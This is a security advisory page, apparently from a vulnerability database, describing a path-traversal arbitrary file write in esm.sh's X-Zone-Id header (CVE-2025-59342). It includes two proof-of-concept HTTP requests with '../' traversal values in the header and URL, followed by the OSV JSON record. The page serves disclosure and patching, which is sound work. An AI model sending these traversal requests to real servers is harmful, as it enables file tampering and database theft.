GHSA-G2H5-CVVR-7GMW

Vulnerability from github – Published: 2025-09-17 19:03 – Updated: 2025-09-26 16:14
VLAI?
Summary
esm.sh has arbitrary file write via path traversal in `X-Zone-Id` header
Details

Summary

A path-traversal flaw in the handling of the X-Zone-Id HTTP header allows an attacker to cause the application to write files outside the intended storage location. The header value is used to build a filesystem path but is not properly canonicalized or restricted to the application’s storage base directory. As a result, supplying ../ sequences in X-Zone-Id causes files to be written to arbitrary directories (example observed: ~/.esmd/modules/transform/<id>/ instead of ~/.esmd/storage/modules/transform).

Severity: Medium

Component / Endpoint:

POST /transform — handling of X-Zone-Id header

The vulnerable code is in https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L116 and https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L411

Impact: Arbitrary file creation / overwrite outside intended storage directory (file write to attacker-controlled path). Possible remote code execution, persistence, tampering with application files, or facilitating further path-traversal attacks.

Proof of Concept (POC)

Request (attacker-supplied X-Zone-Id contains path traversal):

POST /transform HTTP/1.1
Host: localhost:8888
User-Agent: Den/8.7.1
Accept: */*
Connection: keep-alive
Referer: http://localhost:9999/
Content-Type: application/json
X-Zone-Id: ../../modules/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/
Content-Length: 325

{
  "filename": "example2.js",
  "lang": "js",
  "code": "console.log('hello');",
  "importMap": {
    "imports": {
      "react": "https://esm.sh/react",
      "react-dom": "https://esm.sh/react-dom"
    }
  },
  "jsxImportSource": "react",
  "target": "es2022",
  "sourceMap": "external",
  "minify": true
}

Screenshot 2025-09-16 at 21 40 57

Observed result: file written to ~/.esmd/modules/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/example2.js instead of the intended ~/.esmd/storage/modules/transform/.

This can be trigger with another path traversal request below

GET /+c245626ef6ca0fd9ee37759c5fac606c6ec99daa./../../../esm.db?.css HTTP/1.1
Host: localhost:8888
User-Agent: localhost
Accept: */*
Connection: keep-alive
X-Zone-Id: ../
Referer: http://localhost:9999/

Screenshot 2025-09-16 at 21 37 07

Remediation

Simply remove any .. in the X-Zone-Id header before actually process the file.

Credits

Severity ?
5.5 (Medium)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/esm-dev/esm.sh"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "136"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-59342"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-24"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-17T19:03:05Z",
    "nvd_published_at": "2025-09-17T18:15:53Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nA path-traversal flaw in the handling of the `X-Zone-Id` HTTP header allows an attacker to cause the application to write files outside the intended storage location. The header value is used to build a filesystem path but is not properly canonicalized or restricted to the application\u2019s storage base directory. As a result, supplying `../` sequences in `X-Zone-Id` causes files to be written to arbitrary directories (example observed: `~/.esmd/modules/transform/\u003cid\u003e/` instead of `~/.esmd/storage/modules/transform`).\n\n**Severity:** Medium\n\n**Component / Endpoint:** \n\n`POST /transform` \u2014 handling of `X-Zone-Id` header\n\nThe vulnerable code is in https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L116 and https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L411 \n\n**Impact:** Arbitrary file creation / overwrite outside intended storage directory (file write to attacker-controlled path). Possible remote code execution, persistence, tampering with application files, or facilitating further path-traversal attacks.\n\n---\n\n## Proof of Concept (POC)\n\nRequest (attacker-supplied `X-Zone-Id` contains path traversal):\n\n```\nPOST /transform HTTP/1.1\nHost: localhost:8888\nUser-Agent: Den/8.7.1\nAccept: */*\nConnection: keep-alive\nReferer: http://localhost:9999/\nContent-Type: application/json\nX-Zone-Id: ../../modules/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/\nContent-Length: 325\n\n{\n  \"filename\": \"example2.js\",\n  \"lang\": \"js\",\n  \"code\": \"console.log(\u0027hello\u0027);\",\n  \"importMap\": {\n    \"imports\": {\n      \"react\": \"https://esm.sh/react\",\n      \"react-dom\": \"https://esm.sh/react-dom\"\n    }\n  },\n  \"jsxImportSource\": \"react\",\n  \"target\": \"es2022\",\n  \"sourceMap\": \"external\",\n  \"minify\": true\n}\n```\n\u003cimg width=\"2496\" height=\"1214\" alt=\"Screenshot 2025-09-16 at 21 40 57\" src=\"https://github.com/user-attachments/assets/f878c3f0-5d7d-410c-97ac-20116f5496db\" /\u003e\n\n\nObserved result: file written to `~/.esmd/modules/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/example2.js` instead of the intended `~/.esmd/storage/modules/transform/`.\n\nThis can be trigger with another path traversal request below\n\n```\nGET /+c245626ef6ca0fd9ee37759c5fac606c6ec99daa./../../../esm.db?.css HTTP/1.1\nHost: localhost:8888\nUser-Agent: localhost\nAccept: */*\nConnection: keep-alive\nX-Zone-Id: ../\nReferer: http://localhost:9999/\n\n```\n\u003cimg width=\"2516\" height=\"710\" alt=\"Screenshot 2025-09-16 at 21 37 07\" src=\"https://github.com/user-attachments/assets/1fcfbed3-c1d2-4093-82d8-4afda225c685\" /\u003e\n\n---\n\n## Remediation\n\nSimply remove any .. in the `X-Zone-Id` header before actually process the file.\n\n## Credits\n\n- [Ai Ho (Jessie)](https://github.com/j3ssie)\n- [CL Yang](https://github.com/A11riseforme)",
  "id": "GHSA-g2h5-cvvr-7gmw",
  "modified": "2025-09-26T16:14:54Z",
  "published": "2025-09-17T19:03:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/esm-dev/esm.sh/security/advisories/GHSA-g2h5-cvvr-7gmw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59342"
    },
    {
      "type": "WEB",
      "url": "https://github.com/esm-dev/esm.sh/commit/833a29f42aeb0acbd7089a71be11dd0a292d3151"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/esm-dev/esm.sh"
    },
    {
      "type": "WEB",
      "url": "https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L116"
    },
    {
      "type": "WEB",
      "url": "https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L411"
    },
    {
      "type": "WEB",
      "url": "https://pkg.go.dev/vuln/GO-2025-3967"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "esm.sh has arbitrary file write via path traversal in `X-Zone-Id` header"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.